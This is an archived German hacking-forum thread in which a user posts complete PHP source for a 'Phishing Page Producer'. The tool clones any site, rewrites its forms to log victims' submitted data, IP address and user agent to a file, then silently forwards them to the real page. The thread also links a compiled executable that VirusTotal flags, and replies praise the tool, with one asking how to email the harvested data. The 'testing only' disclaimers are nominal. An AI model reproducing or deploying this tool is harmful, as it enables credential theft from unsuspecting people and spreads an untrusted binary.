PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Phishingseiten-Generator - Phishing Seite schnell gemacht



Ken
10.03.2010, 16:28
Hey,

wir alle wissen, so 'ne olle Phishingseite ist schnell und einfach gemacht. Wem das aber trotzdem zu lange dauert oder wer sich dabei ungeschickt anstellt - für denjenigen habe ich aus Langeweile ein kleines PHP-Skript gebastelt, das die Aufgabe übernimmt. Ich habe es "Phishing Page Producer" getauft. ;)

Was das Ding macht: Ihr füttert das Skript mit einem Link. Es lädt sich die Seite, modifiziert alle Formulare geringfügig und generiert das fertige Phishingseiten-PHP-Skript. Wenn man das nun aufruft und dort Formulareingaben eingibt, schaltet sich das Skript kurz dazwischen und speichert die Daten, um den Betrachter anschließend mit den angegebenen Formulareingaben zur Originalseite weiterzuleiten. Also wie mans eben kennt.

Bedingungen: Keine dummen, unberechtigten Fragen stellen; nichts Illegales damit machen; nur für Testzwecke benutzen; niemand anderem Logindaten oder andere persönliche Informationen stehlen (insbesondere den eigenen Freunden nicht); nicht aus niederen Beweggründen missbrauchen; Weitergabe erlaubt, aber Entwicklerhinweis drinnelassen (also dass das Ding von mir stammt). Wenn also Mist damit gebaut wird, nicht mich dafür verantwortlich machen, das ist nie meine Intention gewesen.

ppp.php

<?php
/* ___ ___ ___
* / _ \/ _ \/ _ \
* / /_)/ /_)/ /_)/
* / ___/ ___/ ___/
* \/ \/ \/
* Ken's Phishing Page Producer
* v1.0.0
* d10.03.2010
*/

// Wer hat's erfunden?
echo
" ___ ___ ___\n / _ \/ _ \/ _ \\\n / /_)/ /_)/ /_)/".
"\n / ___/ ___/ ___/\n \/ \/ \/\n Ken's Phishing Page P".
"roducer v1.0.0\n\n";

// Eingegebene Daten auslesen
$cmd = "";
foreach($argv as $val)
{
$cmd .= $val." ";
}
preg_match("|https?://[a-zA-Z0-9\.-_+äöü]*\.[a-z]{2,4}/?.*?|", $cmd, $url);
preg_match("|-l [\"']?([^\s]*)[\"']?|", $cmd, $logfile);
preg_match("|-n [\"']?([^\s]*)[\"']?|", $cmd, $name);
!isset($logfile[1]) ? $logs = "logs.txt" : $logs = $logfile[1];
!isset($name[1]) ? $saveto = "ppp-output-".time().".php" : $saveto = str_replace(array("/", ":"), "", $name[1]);

// Fehlermeldung ausgeben falls Seite fehlt
if(!isset($url[0]))
{
echo
" USAGE\n".
" php ".$_SERVER["PHP_SELF"]." [site] (optional parameters)\n".
" [site] - the site you want to copy\n".
" [options] - some extra options...\n".
" -n <name> - name of the generated script\n".
" -l <file> - log file name\n".
"\n".
" EXAMPLE\n".
" php ".$_SERVER["PHP_SELF"]." http://example.com/ -l logs.txt -n out.php\n".
"\n".
" WARNING\n".
" Stealing anyone else's private data or login information\n".
" without his or her permission is illegal and may be pro-\n".
" secuted. However, this script was written for testing\n".
" and demonstration purpose only. The author is no way re-\n".
" sponsable for any misuse. Please think about this before\n".
" using it.\n\n";
exit;
}

// Seite auslesen und Formulare bearbeiten
echo "
Loading and analysing ".$url[0]."...\n";
$page = str_replace("<head>", "<head>\n<base href=\"".$url[0]."\" />", file_get_contents($argv[1]));
preg_match_all("|<form.*</form>|Usi", $page, $forms);
echo "
".count($forms[0])." forms will be replaced.\n";
foreach($forms[0] as $val)
$page = str_replace($val, preg_replace('|action=[\'"]?([^\'^"^\s]*)[\'"\s]?([^>]*)>?|', 'action="{{self}}"$2><input type="hidden" name="action" value="$1" />', $val), $page);

// Generiere PHP-Skript
echo "
Generating php script.\n";
$script = '
<?php
/* ___ ___ ___
* / _ \/ _ \/ _ \
* / /_)/ /_)/ /_)/
* / ___/ ___/ ___/
* \/ \/ \/
* Ken\'s Phishing Page Producer
* generated on '.date("d.m.Y - H:i").' for '.$url[0].'
*/

$self = "http://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"];
$logs = "'.$logs.'"; // file where logs shall be saved to
if(isset($_POST["action"]))
{
$add = date("d.m.Y - H:i")."\nIP: ".$_SERVER["REMOTE_ADDR"]."\nHost: ".@gethostbyaddr($_SERVER["REMOTE_ADDR"])."\nUA: ".$_SERVER["HTTP_USER_AGENT"]."\nPOSTDATA:\n".print_r($_POST, 1)."\n\n\n";
$h = fopen($logs, "a");
fwrite($h, $add);
fclose($h);
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head>
<base href="'.$url[0].'" />
<noscript><meta http-equiv="refresh" content="0; url='.$url[0].'"/></noscript>
</head>
<body onload="document.getElementsByTagName(\'form\')[0].submit();">
<?php
echo \'<form action="\'.$_POST["action"].\'" method="post">\';
unset($_POST["action"]);
foreach($_POST as $key => $val)
{
echo \'<input type="hidden" value="\'.$val.\'" name="\'.$key.\'" />\';
}
echo \'</form>\'."\n";
?>
</body>
</html>
<?php
exit;
}

$page = \''.str_replace(array("'", "{{self}}"), array("\'", '\'.$self.\''), $page).'\';
echo $page;
?>';

// Fertig, abspeichern
echo "
Done. Saving file to ".$saveto."...\n";
$h = fopen($saveto, "w");
fwrite($h, $script);
fclose($h);

echo "
See you!\n";
exit;
?>Download: Folgendes ist eine "quasi-kompilierte" ausführbare Konsolenanwendung des Skripts, damit auch diejenigen Freude daran haben, die PHP nicht bei sich installiert haben. Wer mir nicht vertraut, hat Pech gehabt.
http://rapidshare.com/files/361598734/ppp.exe.html
http://ul.to/gtktv9
http://www.virustotal.com/de/analisis/67ac7dd2b45cf038175c8b5f756cffd3942d3c8390640a8ad6 5e0c1b168b5d1d-1268245247 (5/42, kommt wahrscheinlich vom Compiler, oder so)



Beispiel, wie man das Ding benutzt (aufruft):
/usr/bin/php ppp.php http://free-hack.com/ -l speicherdaten.txt -n free-hack.ppp.phpP.S: Ich habe überlegt, ob das eher hier rein passt, oder eher in die "Toolz"-Sektion, habe mich aber für die Kategorie hier entschieden, da es thematisch einfach näher liegt. Falls jemand was dagegen hat => verschieben.

moppelito
10.03.2010, 17:36
Wow ich probiers gleich aus, sieht aber sehr gut aus!
muss ich schon sagen, THX

PS: darf ich das umändern, das der das z.B. per Mail verschickt oder in einer Datei die man nicht ohne weiteres öffnen kann?
EDIT: PS²: Ich wäre für Sticky!

Ken
10.03.2010, 18:58
Klar, ihr dürft damit im Prinzip machen, was ihr wollt, ich kanns Euch schlecht verbieten. Ich möchte Euch halt nur nahelegen, dass Missbrauch strafbar ist und ich damit nix zu tun haben will. Außerdem wär ich dankbar, wenn der Name drinbliebe, falls ihr es modifiziert und anschließend weitergebt.

Nachtrag: Wie versprochen, hier der nachgereichte Download.

Download: Folgendes ist eine "quasi-kompilierte" ausführbare Konsolenanwendung des Skripts, damit auch diejenigen Freude daran haben, die PHP nicht bei sich installiert haben. Wer mir nicht vertraut, hat Pech gehabt.
http://rapidshare.com/files/361598734/ppp.exe.html
http://ul.to/gtktv9
http://www.virustotal.com/de/analisis/67ac7dd2b45cf038175c8b5f756cffd3942d3c8390640a8ad6 5e0c1b168b5d1d-1268245247 (5/42, kommt wahrscheinlich vom Compiler, oder so)

Daniel19
19.04.2010, 13:07
Sehr gutes Programm, getestet und für gut befunden.

K3VIN_112
20.04.2010, 22:49
Also bei mir tut sich garnichts

JA HABE PHP INSTALLIERT

Jmd ne Idee woran das liegen kann?

Wie genau geht ihr vor?

MFG

d3rem0
20.04.2010, 23:13
Hey super teil hat auf anhieb gefunzt danke

Ken
21.04.2010, 15:17
Also bei mir tut sich garnichts

JA HABE PHP INSTALLIERT

Jmd ne Idee woran das liegen kann?

Wie genau geht ihr vor?

MFGBenutz das da: http://free-hack.com/phishing/52320-phishingseiten-generator-v1-1-1-a.html

SKR
04.05.2010, 15:11
Bei mir tut sich überhaupt nichts wenn ich es starten will :/.